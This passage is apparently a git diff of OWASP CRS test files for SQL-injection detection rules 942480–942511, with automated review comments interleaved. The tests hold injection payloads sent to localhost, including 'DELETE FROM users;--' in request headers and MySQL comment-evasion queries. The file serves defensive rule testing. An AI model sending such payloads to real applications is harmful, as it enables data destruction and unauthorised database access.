text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: 
"/get/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 10 desc: "SQL injection in User-Agent" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 11 desc: "SQL injection in arbitrary header" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - SomeHeader: DELETE FROM users;-- - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "942480" - - test_title: 942480-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] + - test_id: 12 desc: "SQL injection using 'overlay(...placing..) 
with newlines" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" - version: HTTP/1.0 - output: - log_contains: id "942480" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log: + expect_ids: [942480] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml index 0c5c8c4..910071c 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
@@ -1,381 +1,379 @@ --- meta: author: "Christoph Hansen, azurit" - description: None - enabled: true - name: 942490.yaml +rule_id: 942490 tests: - - test_title: 942490-1 + - test_id: 1 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%22%60%20%2A%20123" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 2 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "' ', 10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "' ', 10" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 3 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - 
method: POST - port: 80 - uri: "/post" - data: "'', '', '', '', '', '', '', '', 13" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 4 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 5 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='1001'='10" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='1001'='10" + version: 
HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 6 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\"2562*23" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\"2562*23" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 7 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":[\"00" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":[\"00" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 8 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=`>6fbdec2" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 
942490-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=`>6fbdec2" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 9 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='][0]]), strtolower($b[$GLOBALS['" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='][0]]), strtolower($b[$GLOBALS['" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 10 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=', 2, 1" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=', 2, 1" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 11 desc: "classic SQL injection probings 3/3" stages: - - 
stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "`>9e7" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "`>9e7" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 12 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\":\"65" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\":\"65" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 13 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='\\2nq5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='\\2nq5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 14 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=` < 0) AND `" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=` < 0) AND `" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 15 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='0:0:6" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='0:0:6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 16 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":60" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":60" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 17 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay=\">%5 - type_submit_reset_5" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay=\">%5 - type_submit_reset_5" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 18 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":35" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":35" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 19 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='3085'='30" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='3085'='30" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 20 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\":\"[0,\\x22" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\":\"[0,\\x22" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 21 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "pay='16/17" - version: HTTP/1.0 - output: - log_contains: id "942490" - - test_title: 942490-22 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "pay='16/17" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] + - test_id: 22 desc: "classic SQL injection probings 3/3" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "\";}7b6" - version: HTTP/1.0 - output: - log_contains: id "942490" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "\";}7b6" + version: HTTP/1.0 + output: + log: + expect_ids: [942490] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml index 8c92f87..54e1480 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942500.yaml 
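Review bot: Every one of the 22 cases in this file carries the same desc, `classic SQL injection probings 3/3`, so a failing run cannot say which payload class regressed; give each case a desc naming what it exercises, e.g. `desc: "backtick followed by comparison operator"` for test 4 and `desc: "quote-terminated JSON fragment"` for test 7. The file also has no negative case, so a later rule change that starts matching ordinary input would pass unnoticed here; one `no_expect_ids: [942490]` case with benign POST data such as `data: "pay=hello world 2024"` would guard that, provided the current rule does not already match it. The migration from `log_contains` to `expect_ids` itself looks consistent across all cases.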
@@ -2,86 +2,85 @@ meta: author: "Franziska Buehler, Max Leske, azurit" description: "Detection of MySQL injection evasion attempts using special comments" - enabled: true - name: 942500.yaml +rule_id: 942500 tests: - - test_title: 942500-1 + - test_id: 1 desc: "Use of portability comment (/*!...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 2 desc: "Use of portability comment (/*!...*/) as evasion technique, with space before !" 
stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" - version: HTTP/1.0 - output: - log_contains: id "942500" - - test_title: 942500-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?id=9999+or+{if+length((/*+!5000select+username/*!50000from*/user+where+id=1))>0}" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] + - test_id: 3 desc: "Use of optimizer hints (/*+...*/) as evasion technique" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 4 desc: "Use of optimizer hints (/*+...*/) as evasion technique with space before +" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 
- uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" - version: "HTTP/1.1" - output: - log_contains: id "942500" - - test_title: 942500-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+%2F*+%2Boptimizer+hint+*%2F+true" + version: "HTTP/1.1" + output: + log: + expect_ids: [942500] + - test_id: 5 desc: "Status Page Test - MySQL inline comment detected" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" - version: HTTP/1.0 - output: - log_contains: id "942500" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?test=9999+or+{if+length((/*!5000select+username/*!comment*/" + version: HTTP/1.0 + output: + log: + expect_ids: [942500] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml index ddf211c..6228849 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942510.yaml 
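Review bot: All five cases are positive, so nothing verifies that an ordinary C-style comment without the `!` or `+` prefix, such as `/* note */`, stays clear of 942500, which is the specificity the description (`special comments`) claims; a `no_expect_ids: [942500]` case with `uri: "/get?test=9999+%2F*+plain+comment+*%2F"` would pin that down, assuming the rule's pattern is as narrow as the description implies. Tests 3 and 4 also send `version: "HTTP/1.1"` while the rest of the file uses `HTTP/1.0`; unless HTTP/1.1 handling is the point of those two cases, aligning them on `version: HTTP/1.0` keeps the file uniform and avoids any keep-alive difference in how the test client reads the response.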
@@ -1,39 +1,37 @@ --- meta: author: "Franziska Buehler, azurit" - description: None - enabled: true - name: 942510.yaml +rule_id: 942510 tests: - - test_title: 942510-1 + - test_id: 1 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - log_contains: id "942510" - - test_title: 942510-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + expect_ids: [942510] + - test_id: 2 desc: "SQLi bypass detected: backticks" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?'bla'" - version: HTTP/1.0 - output: - no_log_contains: id "942510" + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?'bla'" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942510] diff --git a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml index 9cf2ca3..a2096cc 100644 --- a/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml +++ b/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942511.yaml 
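Review bot: The desc on test 2, `SQLi bypass detected: backticks`, describes a positive match, but the case sends a single-quoted value and asserts `no_expect_ids: [942510]`, so a reader scanning the file gets the opposite of what the case checks; rename it, e.g. `desc: "Negative test: single quotes must not trigger the backtick rule"`. The only positive case puts the backtick payload in the query string; a second positive case placing the same payload in POST body data would show the rule's target coverage, if the rule inspects that target.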
@@ -1,39 +1,37 @@ --- meta: author: "Walter Hop, azurit" - description: None - enabled: true - name: 942511.yaml +rule_id: 942511 tests: - - test_title: 942511-1 + - test_id: 1 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get?`bla`" - version: HTTP/1.0 - output: - no_log_contains: id "942511" - - test_title: 942511-2 + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: localhost + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get?`bla`" + version: HTTP/1.0 + output: + log: + no_expect_ids: [942511] + - test_id: 2 desc: "SQLi bypass detected: quotes" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: localhost - Accept: 